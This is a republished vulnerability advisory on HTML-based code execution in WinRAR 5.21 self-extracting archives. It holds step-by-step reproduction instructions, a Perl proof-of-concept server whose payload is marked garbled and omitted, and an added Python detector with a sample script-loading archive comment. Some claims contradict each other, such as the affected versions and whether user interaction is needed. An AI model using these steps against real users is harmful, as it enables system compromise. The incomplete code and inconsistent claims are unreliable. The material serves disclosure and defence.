WinRAR SFX v5.21 Remote Code Execution Vulnerability

Affected Systems:

WinRAR 5.21

Description:

WinRAR is a popular compression/decompression tool.

The "Text and icon" options of WinRAR SFX v5.21, specifically the "Text to display in SFX window" field, have a remote code execution vulnerability: the field accepts HTML, which the SFX stub renders when the archive is opened. Remote attackers exploit it with a crafted archive carrying a malicious payload; once it runs, attacker-chosen code executes and can compromise the system, network or device.

<* Source: Vulnerability Laboratory (research@vulnerability-lab.com)
Mohammad Reza Espargham

Link: http://seclists.org/fulldisclosure/2015/Sep/106
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!

The code execution vulnerability can be exploited by remote attackers without a privileged system user account or user interaction.
For a security demonstration, or to reproduce the vulnerability, follow the information and steps below.

Manual steps to reproduce the vulnerability...
1. Run the Perl code: perl poc.pl
2. Right-click any file and select "Add to archive..."
3. Select "Create SFX archive"
4. Go to the Advanced menu and select "SFX options..."
5. Go to the "Text and icon" menu
6. Copy the Perl script's output (HTML) and paste it into "Text to display in SFX window"
7. Click OK, then OK
8. Your SFX file is created
9. Just open the SFX file
10. Your link is downloaded and executed on the target
11. Successful reproduction of the code execution vulnerability!
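As an added defensive check (not part of the original advisory or its PoC), the Python below triages the SFX script stored in an archive comment, such as one written out with unrar's cw command: it parses the Text brace block that carries the "Text to display in SFX window" content, flags active HTML inside it, and flags commands that run a program or hide the SFX dialog. The Text { } block form and the command names follow WinRAR's SFX script format as I understand it and are assumptions; both sample comments and the example.invalid URL are constructed.

```python
import re

# SFX script commands (WinRAR's names) that run a program or hide the SFX dialog.
AUTORUN_COMMANDS = ("Setup", "Presetup", "Silent", "Overwrite", "TempMode")

# Active-content patterns for the Text block, which the SFX stub renders as HTML.
ACTIVE_HTML = (
    ("script tag", re.compile(r"<\s*script\b", re.I)),
    ("object/embed/iframe", re.compile(r"<\s*(object|embed|iframe)\b", re.I)),
    ("inline event handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("script URI", re.compile(r"\b(javascript|vbscript):", re.I)),
    ("external reference", re.compile(r"\b(src|href)\s*=\s*['\"]?https?://", re.I)),
)

def parse_sfx_script(comment):
    """Split an SFX comment into Key=Value commands and brace blocks such as Text."""
    scalars, blocks, lines, i = {}, {}, comment.splitlines(), 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        if not line or line.startswith(";"):            # blank or ; comment line
            continue
        if i < len(lines) and lines[i].strip() == "{":  # Name / { / body / }
            body, i = [], i + 1
            while i < len(lines) and lines[i].strip() != "}":
                body.append(lines[i])
                i += 1
            i += 1                                       # skip the closing brace
            blocks[line] = "\n".join(body)
        elif "=" in line:
            key, value = line.split("=", 1)
            scalars[key.strip()] = value.strip()
    return scalars, blocks

def triage_sfx_comment(comment):
    """Return findings for an SFX comment; an empty list means no active content."""
    scalars, blocks = parse_sfx_script(comment)
    findings = ["Text block contains " + name
                for name, rx in ACTIVE_HTML if rx.search(blocks.get("Text", ""))]
    findings += ["SFX command %s=%s" % (cmd, scalars[cmd])
                 for cmd in AUTORUN_COMMANDS if cmd in scalars]
    return findings

# Constructed sample comments: plain text versus HTML that pulls a remote script.
BENIGN = ";The comment below contains SFX script commands\nTitle=Report\nText\n{\nPlease read the attached PDF.\n}\n"
SUSPICIOUS = (";The comment below contains SFX script commands\nSilent=1\nText\n{\n"
              "<html><body><script src=\"http://example.invalid/poc.html\"></script></body></html>\n}\n")
if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, triage_sfx_comment(sample) or ["clean"])
```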


PoC: Exploit Code

#!/usr/bin/perl
# Title: WinRAR SFX - Remote Code Execution
# Affected Versions: All Version
# Tested on Windows 7/Server 2008
#
# Author: Mohammad Reza Espargham
# Linkedin: https://ir.linkedin.com/in/rezasp
# E-Mail: me [at] reza [dot] es, reza.esparham [at] gmail [dot] com
# Website: www.reza.es
# Twitter: https://twitter.com/rezesp
# FaceBook: https://www.facebook.com/reza.espargham
#
# ID: MS14-064

use strict;
use warnings;
use IO::Socket;
use MIME::Base64 qw(decode_base64);
use Socket 'inet_ntoa';
use Sys::Hostname 'hostname';

# Address and port the PoC web server listens on (the SFX text points here)
my $ip   = inet_ntoa(scalar gethostbyname(hostname() || 'localhost'));
my $port = 80;

print "Winrar HTML Code\n";
# The HTML snippet to paste into "Text to display in SFX window" was printed
# here, referencing http://$ip:$port/; that line is garbled in this copy.
print "Serving on http://$ip:$port/\n";

my $server = IO::Socket::INET->new(
    Proto     => 'tcp',
    LocalPort => $port,
    Listen    => SOMAXCONN,
    ReuseAddr => 1,
) or die "Unable to create server socket: $!";

# Server loop: read one request's headers up to the blank line, then answer it
while (my $client = $server->accept()) {
    my $client_info = '';
    while (<$client>) {
        last if /^\r\n$/;
        $client_info .= $_;
    }
    incoming($client, $client_info);
}

sub incoming {
    my ($client, $client_info) = @_;
    print "\n=Incoming Request:\n$client_info";
    print {$client} buildResponse($client, $client_info);
    close($client);
}

sub buildResponse {
    my ($client, $client_info) = @_;

    # The original PoC decoded a base64-encoded HTML page (its MS14-064 payload)
    # here; that blob is garbled beyond recovery in this copy and is omitted.
    # PLACEHOLDER: a plain page is served in its place.
    my $poc = "<html><body>[payload omitted]</body></html>\n";

    my $r = "HTTP/1.0 200 OK\r\nContent-type: text/html\r\n\r\n$poc";
    return $r;
}

Suggestion:

Vendor patch:

WinRAR
------
The vendor has not yet released a patch or upgrade. Users of the software should check the vendor's homepage for the latest version:

http://www.win-rar.com/start.html
